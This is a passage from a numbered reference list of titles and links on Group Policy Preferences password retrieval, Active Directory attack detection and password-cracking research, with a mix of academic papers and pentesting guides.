https://rootguard.gitbook.io/cyberops/detection-engineering/threat-detection/ad-detections-and-mitigations/password-in-group-policy-preferences-gpp-compromise 591 Automated Implementation of Windows-related Security-Configuration 592 Guides https://arxiv.org/pdf/2209.08936.pdf 593 Search-based Ordered Password Generation of Autoregressive Neural 594 Networks http://arxiv.org/pdf/2403.09954.pdf 595 Universal Neural-Cracking-Machines: Self-Configurable Password Models 596 from Auxiliary Data http://arxiv.org/pdf/2301.07628.pdf 597 SE#PCFG: Semantically Enhanced PCFG for Password Analysis and Cracking https://arxiv.org/pdf/2306.06824.pdf 598 Detecting Forged Kerberos Tickets in an Active Directory Environment https://arxiv.org/ftp/arxiv/papers/2301/2301.00044.pdf 599 HADES: Detecting Active Directory Attacks via Whole Network Provenance 600 Analytics http://arxiv.org/pdf/2407.18858.pdf 601 Alice in Passphraseland: Assessing the Memorability of Familiar 602 Vocabularies for System-Assigned Passphrases https://arxiv.org/pdf/2112.03359.pdf 603 When AI Defeats Password Deception! A Deep Learning Framework to 604 Distinguish Passwords and Honeywords http://arxiv.org/pdf/2407.16964.pdf 605 Group Policy Preferences - Tactics, Techniques, and Procedures https://ttp.parzival.sh/pentesting/infrastructure/active-directory/group-policy-preferences 606 Group Policy Preferences (GPP) password retrieval | The guide https://reaper.gitbook.io/my-penetration-test-guide/guide/privilege-escalation/windows-privilege-escalation/group-policy-preferences-gpp-password-retrieval 607 Group Policy Preferences - Tidal Cyber https://app.tidalcyber.com/techniques/57dd1624-42e9-42a6-b1bb-d1d1df233138 608 Attacking Active Directory - GPP Credentials https://www.youtube.com/watch?v=sTedpt47t2Y 609 Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting https://infosecwriteups.com/attacking-gpp-group-policy-preferences-credentials-active-directory-pentesting-16d9a65fa01a?gi=e5aac7720d23 610 Group Policy Preferences | yuyudhn's notes https://htb.linuxsec.org/active-directory/credential-hunting/group-policy-preferences 611 Attacking GPP (Group Policy Preferences) Credentials - Reddit https://www.reddit.com/r/InfoSecWriteups/comments/xdvst4/attacking-gpp-group-policy-preferences/ 612 Group Policy Preferences (GPP) Passwords in SYSVOL - Haxoris Wiki https://haxoris.com/haxoris-wiki/active-directory/gpp-cpassword-in-sysvol